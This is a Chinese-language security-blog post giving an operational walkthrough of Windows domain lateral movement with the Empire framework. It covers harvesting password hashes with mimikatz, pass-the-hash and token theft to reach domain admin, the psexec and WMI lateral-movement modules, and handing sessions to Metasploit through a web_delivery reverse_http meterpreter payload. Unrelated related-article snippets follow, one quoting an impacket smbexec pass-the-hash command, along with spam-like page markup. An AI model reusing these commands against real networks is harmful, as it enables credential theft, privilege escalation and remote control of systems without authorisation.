<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    橫向移動相關

    VSole2022-05-08 06:31:56

    #001 獲取密碼hash

    1、內置mimikatz:

    mimikatz    #執行會有點緩慢,執行成功即可抓取hash
    

    2、creds命令:

    creds
    

    creds<空格>+<雙擊tab鍵> 可以看到擴展命令
    

    當內網很復雜,hash很多時,可以通過export導出為csv文件


    crds export /root/hash    #會自動添加文件后綴
    

    結果如下:

    #002 橫向移動模塊

    1、令牌竊取配合hash傳遞:

    ①執行mimikatz后

    creds    #列出所有Empire獲取到的密碼
    

    ②當發現列舉出的creds中,有域高權限用戶時,使用hash傳遞方式攻擊:


    pth
    

    然后就能看見PID號,竊取該PID進程的令牌即可


    steal_token
    

    即可成功獲取域管權限

    2、橫向移動常用模塊:

    ①invoke-psexec:

    usemodule lateral_movement/invoke_psexec
    set ComputerName <目標計算機名>
    set Listener <監聽器名稱>
    

    成功會返回目標機器的agent會話

    ②invoke-wmi:

    usemodule lateral_movement/invoke_wmi
    set ComputerName <目標計算機名>
    set Listener <監聽器名稱>
    

    成功會返回目標機器的agent會話

    ③其他模塊根據實際情況選用即可

    usemodule lateral_movement/    #tab鍵列出模塊
    

    #003  轉為MSF會話

    Invoke-MetasploitPayload<-->web_delivery(MSF):

    ①MSF執行


    use exploit/multi/script/web_delivery
    set target 2
    set payload windows/meterpreter/reverse_http
    set lhost
    set lpotr <監聽端口>
    exploit
    

    ②Empire執行:

    usemodule code_execution/invoke_metasploitpayload
    set URL
    execute
    

    執行成功后,MSF會上線一個新的meterpreter會話

    hash
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    //oldTab:引用擴容前的哈希表。//oldCap:表示擴容前的table數組的長度。//獲得舊哈希表的擴容閾值。//newThr:擴容之后下次觸發擴容的條件。//條件成立說明hashMap中的散列表已經初始化過了,
    一般翻譯做“散列”,也有直接音譯為“哈希”的,就是把任意長度的輸入,通過散列算法,變換成固定長度的輸 出,該輸出就是散列值。
    Perfetch Hash Cracker是一款基于Rust開發的強大暴力破解工具,該工具可以幫助廣大研究人員通過爆破的形式破解prefetch哈希。
    隨著攻防演練的頻繁和?們安全意識的提升,企業內部Windows主機的?令也設置的較為復雜,經 常拿到windows 服務器的時候,獲取到了hash,但是?法解密出密碼的情況,這時候就需要?法,攻擊者不需要花費時間來懟hash進?02測試環境Windows server 2012 ?先需要獲取ntml hash,由于直接從內存讀取到的可能是密碼修改之前的hash,這?些遠程命令的執??持wmi,默認開啟,且windows 默認不會將wmi 的操作記錄到?具的原理是wmi 創建進程執?impacket 中的smbexec 程序,命令如下python3 smbexec.py -hashes
    Wavecrack是一款針對密碼安全的強大工具,該工具提供了一個用戶友好的Web接口,該工具支持預定義的配置,并能夠在多個用戶之間共享hashcat破解信息,然后使用hashcat實現密碼破解。?hashcatFlaskCelerySQLiterabbitmq-serverhashcat規則字典文件?首先,我們需要使用下列命令將該項目源碼克隆至本地:git?安裝RabbitMQ服務器和python-ldap依賴:$?開啟RabbitMQ服務器:$ sudo service rabbitmq-server start. 工具首頁添加一個待破解的哈希查看結果和其他狀態信息?本項目的開發與發布遵循GNU開源許可證協議。?
    筆者在對volatility工具進行了解后,對分析vmem文件的手法進行了一定優化,可以提升解決鎖屏問題的效率。不過官方團隊并沒有打包volatility3的可執行程序,原因寫的是打包出來的packages會被識別為惡意軟件,解決了這個問題就會出可執行程序了。過程思路一、直接在esxi中部署volatility3項目Linux環境下的esxi,這個思考很快就被證明不太可行了,volatility3需要多個系統庫和pip庫:yum install zlib &&\yum install zlib-devel &&\yum install bzip2-devel &&\yum install ncurses-devel &&\yum install sqlite-devel &&\yum install readline-devel &&\yum install gcc &&\yum install libffi &&\yum install libffi-devel &&\yum install gcc-c++\yum install openssl-devel\yum install tk-devel
    雖然加密技術新輩多出,但哈希算法(也稱“散列算法”)自誕生以來,已成為加密算法領域不可或缺的應用。 最簡單的散列算法也被用來加密存在數據庫中的密碼字符串,日常我們在各大APP中注冊時填寫的密碼均是以字符串方式保存在服務器中,用戶登陸時需要再次對輸入密碼實施哈希計算,而后將兩個密碼字符串進行碰撞驗證登陸。
    內網滲透hash竊取技巧
    2021-11-28 06:53:23
    在內網滲透的過程中,最重要的就是信息搜集,但是在極端情況下我們找不到能夠橫或者跨域的機器,那么這時候我們就可以嘗試做一個水坑,來嘗試獲取hash。當然這只是理想情況,在愈發強調對抗的當下,利用水坑釣魚也變得不是那么簡單。
    我們知道HashMap底層是由數組+鏈表/紅黑樹構成的,當我們通過put(key, value)向hashmap中添加元素時,需要通過散列函數確定元素究竟應該放置在數組中的哪個位置,當不同的元素被放置在了數據的同一個位置時,后放入的元素會以鏈表的形式,插在前一個元素的尾部,這個時候我們稱發生了hash沖突。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类